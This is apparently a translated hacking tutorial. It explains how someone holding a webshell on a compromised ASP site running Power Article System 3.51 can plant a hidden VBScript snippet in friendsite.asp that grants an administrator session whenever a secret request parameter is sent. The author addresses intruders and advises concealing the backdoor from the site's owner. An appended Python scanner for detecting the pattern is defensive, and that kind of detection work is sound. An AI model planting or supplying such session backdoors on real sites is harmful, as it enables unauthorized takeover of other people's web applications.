Using ASP Trojan Horse program to obtain administrative rights

Source: Internet
Author: User
Tags: md5, encryption, administrator, password
Some time ago the upload vulnerabilities in the Dongwang (DVBBS) forum were everywhere, and recently one ASP system after another has been exposed with upload holes, so many friends probably have a pile of webshell "broilers" (compromised hosts) in hand. What people do with these chickens differs: some keep escalating privileges and intrude further; some just have a look, plant the horse and then forget about it; and for some friends, once the novelty of the webshell wears off, the mystery and temptation of the admin backend grows considerably.

In fact, for many powerful systems, getting into the backend is as good as getting a proper backdoor. The problem is that the newer versions of many ASP systems store the password as an MD5 hash and check it with a strict verification procedure. Is there really no way around these restrictions? Of course there is! Today I will explain how to bypass them and walk straight into the backend. If you already have a horse planted, so much the better. Follow me...

Session Cheat Chapter

First, a quick summary of how ASP systems generally authenticate. The backend administrator enters an account and password on the login page. The program either takes that username and password to the administrator table in the database and looks them up (if a matching record exists, you are the administrator), or it first looks up the password stored for your username, then compares it with the one you submitted. Either way, if the check passes, the program gives you a session value that represents your identity. Every admin page you then open verifies that session value first: if it says you are the administrator you are let through; if not, you are sent back to the login page or shown some odd warning, depending on the programmer's personal taste.

Knowing this principle, our line of thought is to use our ASP Trojan to modify the program so that it hands us an administrator session. Even without the administrator's password, we are then the same as the administrator in the backend. I call this method session deception. Space does not permit describing every system in detail, so this article uses Power Article System as the example.

Power Article System 3.51 (Figure I)

[Figure I: Power Article System 3.51]

In fact, all versions of Power Article System are affected, including PowerEasy. You can practise it yourself.

Let's look at the verification code first. In Power Article System 3.51 the verification page is admin_chklogin.asp, and its verification logic is as follows:

............
Else
    ' Username and password matched: record the login and hand out the admin session
    rs("Lastloginip") = Request.ServerVariables("REMOTE_ADDR")
    rs("Lastlogintime") = Now()
    rs("Logintimes") = rs("Logintimes") + 1
    rs.Update
    Session.Timeout = SessionTimeout
    Session("AdminName") = rs("username")
    rs.Close
    Set rs = Nothing
    Call CloseConn()
    Response.Redirect "Admin_index.asp"


The ellipsis before Else covers the case where the username or password is wrong. Look: if the username and password are correct, you are given two session values:

Session.Timeout = SessionTimeout
Session("AdminName") = rs("username")


Now let's look at how the other admin pages validate the session, starting with admin_index.asp:

It looks very strict, but look closely: all it verifies is the AdminName session. If our session carries an AdminName value, won't it let us through? All right, let's get started. First we need the admin account: browse his site, or download the database directly and look. Then we find a page to modify. I picked friendsite.asp (the friendship links page), which gets little traffic and has plenty of content, so the administrator is unlikely to notice. Use the ASP Trojan's editing function to edit it and add the following lines somewhere hidden in the page:

Dim id
id = Trim(Request("Qwe"))
If id <> "" Then   ' the comparison operator was lost in extraction; "not empty" is the reconstructed condition
    Session("adminname") = "admin"   ' "admin" is assumed here; in practice change it to the administrator account you want
End If
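From the defender's side, as an added example that is not part of the original article: a small Python scanner for the session-deception pattern described above. It flags any ASP page other than the login handler (admin_chklogin.asp, taken from the article) that assigns the AdminName session, and marks the finding as higher risk when a Request() read appears in the lines just before it, as in the injected snippet. The sample site contents are constructed.

```python
import re
from dataclasses import dataclass

# Session key this CMS uses as its "you are the administrator" marker (from the article).
ADMIN_SESSION_KEYS = {"adminname"}
# The only page where assigning that key is legitimate (the login handler).
ALLOWED_SETTERS = {"admin_chklogin.asp"}

# Session("key") = ...   (VBScript is case-insensitive, whitespace varies)
SESSION_SET = re.compile(r'session\s*\(\s*"(?P<key>[^"]+)"\s*\)\s*=', re.IGNORECASE)
# Request("x"), Request.Form("x"), Request.QueryString("x"), Request.Cookies("x")
REQUEST_READ = re.compile(r'\brequest(\.(form|querystring|cookies))?\s*\(', re.IGNORECASE)

@dataclass
class Finding:
    path: str
    line: int
    key: str
    request_gated: bool   # True when a Request() read precedes the assignment

def scan_asp_source(path, source, window=3):
    """Return findings for admin-session assignments in one ASP file."""
    findings = []
    if path.lower() in ALLOWED_SETTERS:
        return findings
    lines = source.splitlines()
    for i, text in enumerate(lines, 1):
        m = SESSION_SET.search(text)
        if not m or m.group("key").lower() not in ADMIN_SESSION_KEYS:
            continue
        # Look back a few lines: a session grant driven by user input is the backdoor shape.
        context = "\n".join(lines[max(0, i - 1 - window):i])
        findings.append(Finding(path, i, m.group("key"), bool(REQUEST_READ.search(context))))
    return findings

def scan_site(files):
    """files: mapping of relative path -> ASP source text."""
    out = []
    for path, src in files.items():
        out.extend(scan_asp_source(path, src))
    return out

# Constructed sample site: the legitimate login handler, a page with the injected
# grant, and an unrelated page that touches a harmless session key.
SAMPLE_SITE = {
    "admin_chklogin.asp": 'Session.Timeout = SessionTimeout\nSession("AdminName") = rs("username")\n',
    "friendsite.asp": '<%\nDim id\nid = Trim(Request("Qwe"))\nIf id <> "" Then\n'
                      '    Session("adminname") = "admin"\nEnd If\n%>\n',
    "index.asp": '<% Session("visits") = Session("visits") + 1 %>\n',
}

if __name__ == "__main__":
    for f in scan_site(SAMPLE_SITE):
        print(f"{f.path}:{f.line} sets Session({f.key!r}); request-gated={f.request_gated}")
```

Run it over a copy of the web root; a hit outside the login handler is a page to diff against a clean install.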
